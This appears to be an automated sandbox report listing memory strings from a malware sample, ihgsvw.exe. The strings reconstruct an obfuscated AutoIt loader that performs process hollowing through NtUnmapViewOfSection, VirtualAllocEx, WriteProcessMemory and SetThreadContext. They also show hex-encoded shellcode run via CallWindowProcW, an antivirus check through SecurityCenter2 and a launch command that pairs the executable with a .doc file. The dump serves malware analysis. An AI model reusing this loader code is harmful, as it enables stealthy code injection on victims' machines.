Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: seges
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eflags
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segss
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: segcs
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @_0fo
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: magic
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: spareh
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bool*
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mutantx
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tructsetdata($_y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29, "imagebase", $_y0x3856f9de14e2ba5f487d3ca88dd6)%
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9da03e8ac4574770c = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25 & "]")0
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9da06e2a9547d60269f = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec393615648ea9a741d539c772 & "]", $_y0x3856f9de06c289745d400699b7ca007c)
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c71deeb255577407a78ecb36518053, $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c718eeba446d73399590f5327c
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0aaea34518865a6654b
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)9y
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c71deeb25541 = dllstructgetsize($_y0x3856f9da0ae6bc5141)qy
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)ey
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)iy<
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msctfime ui
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: `\[tp\[t
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \[t][t
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ][t ][t0][t@][t
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9de0ae6bc5141 = dllstructgetptr($_y0x3856f9da0ae6bc5141)=x
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: createobject("wscript.shell").run "c:\users\user~1\appdata\local\temp\folder~1\ihgsvw.exe c:\users\user~1\appdata\local\temp\folder~1\ccmbpo~1.doc"
Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27 = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword po
Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s3tt!n
Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: oihgsvw.exe
Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: der10_51
Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ryoihgsvw.exeder10_51
Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [i[pi
Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\users\user\temp\wfccrina.ini~e;h
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cf80e - $_y0x3856f9de0fe3ac427d61268995eb0e
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002\software\microsoft\windows nt\currentversion?a
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)ca
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l $_y0x3856f9da1ec28a69 = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")d
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "readprocessmemory", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif.n
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifzn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifpn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifin
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifon8
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifbn;
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endiffn_
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 1
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 3
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: case 2
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nextk
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wend-m
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfuncym
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif_m
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfuncrm
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfuncpm)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tructsetdata($_y0x3856f9da1ec28a69, "imagebaseaddress", $_y0x3856f9de14e2ba5f487d3ca88dd6)f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)$
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "e" & "ax", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653)#
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "rcx", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653),
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $_y0x3856f9c61aefba5579760c, "ptr", dllstructgetptr($_y0x3856f9da0dc886645d4a019f))
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "dword", "resumethread", "handle", $_y0x3856f9c61aefba5579760c)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61ef5a7537d61269f)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61aefba5579760c)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return dllstructgetdata($_y0x3856f9da3ef5a7537d61269990e1314a9367a9627b43cd06, "processid")0
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da0ae6bc5141, $_y0x3856f9de0fe3ac427d6126889cf80e, $_y0x3856f9de0fe3ac427d61268995eb0e, $_y0x3856f9c807eaa9577d4a63f2a0)#
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c71deeb255777417aa96ec3c7c, $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9da0be9ba597d610c, $_y0x3856f9c70ae6bc5141, $_y0x3856f9da0fe3ac427d61269f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c708eba95741 = 3 + 7 * $_y0x3856f9c807eaa9577d4a63f2a0
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: while $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8 < $_y0x3856f9c71deeb255410
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029 = dllstructcreate("dword virtualaddress; dword sizeofblock", $_y0x3856f9de0ae6bc5141 + $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8)$
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "virtualaddress")"
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c71deeb255777417aa96ec3c7c = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "sizeofblock")
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f = ($_y0x3856f9c71deeb255777417aa96ec3c7c - 8) / 21
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9da0be9ba597d610c = dllstructcreate("word[" & $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f & "]", dllstructgetptr($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029) + 8)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c70ae6bc5141 = dllstructgetdata($_y0x3856f9da0be9ba597d610c, 1, $_y0x3856f9c717)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if bitshift($_y0x3856f9c70ae6bc5141, 12) = $_y0x3856f9c708eba95741 then,
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9da0fe3ac427d61269f = dllstructcreate("ptr", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991 + bitand($_y0x3856f9c70ae6bc5141, 0xfff))"
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9da0fe3ac427d61269f, 1, dllstructgetdata($_y0x3856f9da0fe3ac427d61269f, 1) + $_y0x3856f9c70ae2a444794b)"
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_allocateexespaceataddress($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f, $_y0x3856f9c71deeb25541):
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x1000, "dword", 64)9
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_allocateexespace($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9c71deeb25541)3
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", 0, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_unmapviewofsection($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f)!
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("ntdll.dll", "int", "ntunmapviewofsection", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f)#
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "iswow64process", "handle", $_y0x3856f9c61ef5a7537d61269f, "bool*", 0)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")/
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)w
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ssssss = "/x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////"u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//"u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "//8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//"u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "//8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a"u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////"u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8"u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4"u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $owmi = objget("winmgmts:\\localhost\root\securitycenter2")
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fe1cc89e6f4a411499bfda1b69b8
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_allocateexespaceataddressu
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c80ff2bc5f51660df0cdd6p\b8;u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user~1\appdata\local\temp6u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6!u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c\u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9da3df3a9426c6725af97e9387cwu
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed01c99c7540460a80acc31b7cbu
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9db20eeab5f7c770ab29ce2277c}u
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef20f3a16f5a7d218d90e33b7chu
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9e61ed880714b5a068fa3ca0ecu
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9e61ed880714b5a0387b5d6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed0fcb8f6f4d411094b2ca0e7c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed0fcb8f6f59570699c8bd6f7c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user~1\appdata\local\temp
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f4974479613eab97fd307c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0ei
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_allocateexespaceataddress
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e0b8
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dd0bffad7d777620aa9cd6ini
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed0fcb8f6f59570699c8b6657c8t
